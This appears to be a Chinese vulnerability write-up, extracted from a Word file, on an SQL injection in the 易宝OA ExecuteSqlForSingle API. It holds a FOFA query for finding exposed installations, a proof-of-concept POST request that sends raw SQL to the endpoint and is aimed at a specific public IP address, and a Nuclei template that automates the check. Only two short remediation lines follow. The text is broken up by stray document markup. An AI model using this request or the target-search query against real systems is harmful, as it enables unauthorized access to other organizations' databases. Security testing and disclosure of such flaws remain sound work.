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易宝OA ExecuteSqlForSingle SQL注入漏洞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易宝OA是一款非常强大的手机办公软件，这里不仅为广大的用户提供了一个更好的工作日历，而且每个人都可以在这里进行重要事项的记录，同时软件中还拥有更好的打卡系统，让用户可以快速记录自己的工作时常，而且调班与补卡也会更加的简单，让你工作活跃度得到提升。该产品存在SQL注入漏洞，可通过该漏洞获取数据库权限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title="欢迎登录易宝OA系统" || banner="易宝OA"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1320" cy="2154555"/>
            <wp:effectExtent l="0" t="0" r="508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07000" cy="2553970"/>
            <wp:effectExtent l="0" t="0" r="508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255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隐患url，验证如下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POST /api/system/ExecuteSqlForSingle HTTP/1.1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Host: 121.35.99.21:8000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Content-Type: application/x-www-form-urlencoded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User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15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Content-Length: 103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token=zxh&amp;sql=select substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)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&amp;strParameters=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89245" cy="2805430"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1397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Nucle脚本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id: yb-oa-api-system-executesqlforsingle-sqli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info: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name: 易宝OA ExecuteSqlForSingle SQL注入漏洞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author: m0be1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severity: high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description: 易宝OA是一款非常强大的手机办公软件，这里不仅为广大的用户提供了一个更好的工作日历，而且每个人都可以在这里进行重要事项的记录，同时软件中还拥有更好的打卡系统，让用户可以快速记录自己的工作时常，而且调班与补卡也会更加的简单，让你工作活跃度得到提升。该产品存在SQL注入漏洞，可通过该漏洞获取数据库权限。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reference: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- https://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metadata: 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fofa-query: title="欢迎登录易宝OA系统" || banner="易宝OA"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verified: true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max-request: 1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http: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- raw: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- |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POST /api/system/ExecuteSqlForSingle HTTP/1.1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Host: {{Hostname}}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Content-Type: application/x-www-form-urlencoded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User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15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Content-Length: 103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token=zxh&amp;sql=select substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)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&amp;strParameters=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4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    matchers: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- type: dsl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dsl:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">          - 'status_code==200 &amp;&amp; contains_all(body,"e10adc3949ba59abbe56e057f20f883e")'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升级到安全版本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Sql预编译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919A2E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C1919A2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626C164"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5626C1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BF49AF"/>
    <w:rsid w:val="150A4C2B"/>
    <w:rsid w:val="220F79FB"/>
    <w:rsid w:val="43FA7FC0"/>
    <w:rsid w:val="465D66D7"/>
    <w:rsid w:val="519C4558"/>
    <w:rsid w:val="55E16F5A"/>
    <w:rsid w:val="63985EF5"/>
    <w:rsid w:val="6745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2023-11-23T14:59:15Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>wll</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-23T15:05:01Z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637A593B6846436488AF5223BCC645FB_12</vt:lpwstr>
  </property>
</Properties>
</file>